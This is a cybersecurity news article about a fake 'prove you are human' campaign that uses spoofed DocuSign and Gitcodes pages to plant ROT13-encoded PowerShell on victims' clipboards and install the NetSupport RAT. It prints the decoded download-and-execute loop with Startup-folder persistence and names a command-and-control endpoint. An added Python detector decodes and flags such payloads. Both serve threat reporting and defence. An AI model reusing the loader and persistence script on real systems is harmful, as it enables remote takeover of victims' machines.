Threat Actors Exploit a 'Prove You Are Human' Scheme to Deliver Malware
Researchers have discovered a sophisticated malware campaign that exploits users' trust in common internet verification processes to spread malware on Windows systems. The attackers use spoofed websites (such as fake Gitcodes repositories and DocuSign pages) to trick users into running PowerShell scripts, ultimately installing the NetSupport remote access trojan. The campaign uses a multi-stage attack strategy and clipboard poisoning to deliver malware without the victim's knowledge. 2025-6-4 13:59:6 Author: cybersecuritynews.com

Threat Actors Exploit ‘Prove You Are Human’ Scheme To Deliver Malware

Cybersecurity researchers have uncovered a sophisticated malware campaign that weaponizes users’ trust in routine internet verification processes to deliver malicious payloads.

The scheme exploits familiar “prove you are human” prompts, transforming seemingly innocent website interactions into vectors for malware distribution across Windows systems worldwide.

The campaign employs deceptive websites that mimic legitimate services, including spoofed Gitcodes repositories and fraudulent DocuSign verification pages, to trick users into executing malicious PowerShell scripts on their machines.


Gitcodes (Source – DomainTools)

Victims are manipulated into copying and pasting these scripts directly into their Windows Run prompt, initiating a cascade of automated downloads that ultimately install the NetSupport Remote Access Trojan (RAT) on infected systems.

DomainTools analysts identified this malicious multi-stage downloader campaign targeting Windows users through carefully crafted social engineering techniques.

Attack flow (Source – DomainTools)

The researchers discovered that threat actors are leveraging multiple themed websites to host PowerShell scripts designed to bypass traditional security measures through their staged approach.

The campaign represents a significant evolution in social engineering tactics, as it requires victims to actively participate in their own compromise while believing they are completing legitimate verification procedures.

The attack infrastructure demonstrates remarkable sophistication, utilizing multiple registrars including Cloudflare, NameCheap, and NameSilo, with name servers distributed across cloudflare.com, luxhost.org, and namecheaphosting.com.

This distributed approach enhances the campaign’s resilience against takedown efforts while providing attackers with multiple fallback options for payload delivery.

Advanced Clipboard Poisoning and Infection Mechanism

The most insidious aspect of this campaign lies in its clipboard poisoning technique, particularly evident in the fake DocuSign verification pages.

Fake Docusign CAPTCHAs (Source – DomainTools)

When victims encounter these fraudulent sites, they are presented with interfaces that closely resemble legitimate Cloudflare browser checking pages mixed with DocuSign branding.

Upon clicking what appears to be a standard CAPTCHA checkbox, the malicious page triggers an “unsecuredCopyToClipboard()” function that silently copies an encoded multi-layered string to the user’s clipboard.

The copied content, initially ROT13 encoded to evade signature detection, decodes to reveal a PowerShell script designed to establish persistence and download additional payloads.

A representative example of the decoded script demonstrates the attack’s methodology:

while ($true) {
    try {
        (New-Object Net.WebClient).DownloadFile($url, $path);
        if ((Get-Item $path).length -ge 20000) {
            Start-Process $path;
            break;
        }
    } catch {}
    Start-Sleep -Seconds 10;
}
$WScriptShell = New-Object -ComObject WScript.Shell;
$Shortcut = $WScriptShell.CreateShortcut($env:APPDATA + "\Microsoft\Windows\Start Menu\Programs\Startup\wbdims.lnk");
$Shortcut.TargetPath = $path;
$Shortcut.Save();

This script establishes a persistent download loop, automatically retrieves the “wbdims.exe” payload from GitHub, and creates a startup folder shortcut to ensure the malware executes upon each user login.
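The clipboard payload described above can be triaged on the defensive side by undoing the ROT13 layer and looking for the behaviours the decoded script exhibits. The following is an added example, not code from the article or from DomainTools; the regexes, keyword list and scoring threshold are this editor's assumptions, and the sample clipboard text is constructed from the script lines quoted above.

```python
import codecs
import re

# Behaviours called out in the article's decoded script: a WebClient download
# loop, launching the dropped file, and a Start Menu\Startup .lnk for persistence.
INDICATORS = {
    "webclient_download": re.compile(r"Net\.WebClient\)\.DownloadFile", re.I),
    "retry_loop": re.compile(r"while\s*\(\s*\$true\s*\)", re.I),
    "start_process": re.compile(r"Start-Process\s+\$\w+", re.I),
    "startup_shortcut": re.compile(r"\\Start Menu\\Programs\\Startup\\[^\"']+\.lnk", re.I),
    "wscript_shell": re.compile(r"New-Object\s+-ComObject\s+WScript\.Shell", re.I),
}
# Assumed cmdlet names used to decide whether text is PowerShell before/after ROT13.
PS_KEYWORDS = ("New-Object", "Start-Process", "Start-Sleep", "Invoke-Expression")


def rot13(text: str) -> str:
    """ROT13 is its own inverse, so this both encodes and decodes."""
    return codecs.decode(text, "rot_13")


def looks_rot13_powershell(text: str) -> bool:
    """True when PowerShell cmdlets appear only after ROT13 decoding."""
    return (not any(k in text for k in PS_KEYWORDS)
            and any(k in rot13(text) for k in PS_KEYWORDS))


def find_indicators(script: str) -> list:
    return [name for name, rx in INDICATORS.items() if rx.search(script)]


def analyze_clipboard_payload(payload: str) -> dict:
    """Classify clipboard text the way a paste guard or EDR rule might (assumed threshold: 2 hits)."""
    encoded = looks_rot13_powershell(payload)
    script = rot13(payload) if encoded else payload
    hits = find_indicators(script)
    return {"rot13_encoded": encoded, "indicators": hits,
            "verdict": "suspicious" if len(hits) >= 2 else "benign"}


# Constructed sample: the loop and persistence lines quoted in the article,
# ROT13 encoded as the fake CAPTCHA page would place them on the clipboard.
SAMPLE_DECODED = (
    "while ($true) { try { (New-Object Net.WebClient).DownloadFile($url, $path); "
    "if ((Get-Item $path).length -ge 20000) { Start-Process $path; break } } catch {} "
    "Start-Sleep -Seconds 10 }\n"
    "$WScriptShell = New-Object -ComObject WScript.Shell;\n"
    "$Shortcut = $WScriptShell.CreateShortcut($env:APPDATA + "
    "\"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wbdims.lnk\");"
)
SAMPLE_CLIPBOARD = rot13(SAMPLE_DECODED)

if __name__ == "__main__":
    print(analyze_clipboard_payload(SAMPLE_CLIPBOARD))
    print(analyze_clipboard_payload("Get-ChildItem C:\\Users"))
```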

The multi-stage approach includes additional command-and-control mechanisms, with infected systems checking in via endpoints like “docusign.sa.com/verification/c.php” to signal successful compromise and trigger subsequent payload deliveries.

The campaign’s effectiveness stems from its exploitation of user familiarity with legitimate verification processes, combined with sophisticated technical implementation that segments the attack across multiple stages to evade detection and complicate attribution efforts.



Article source: https://cybersecuritynews.com/threat-actors-exploit-prove-you-are-human/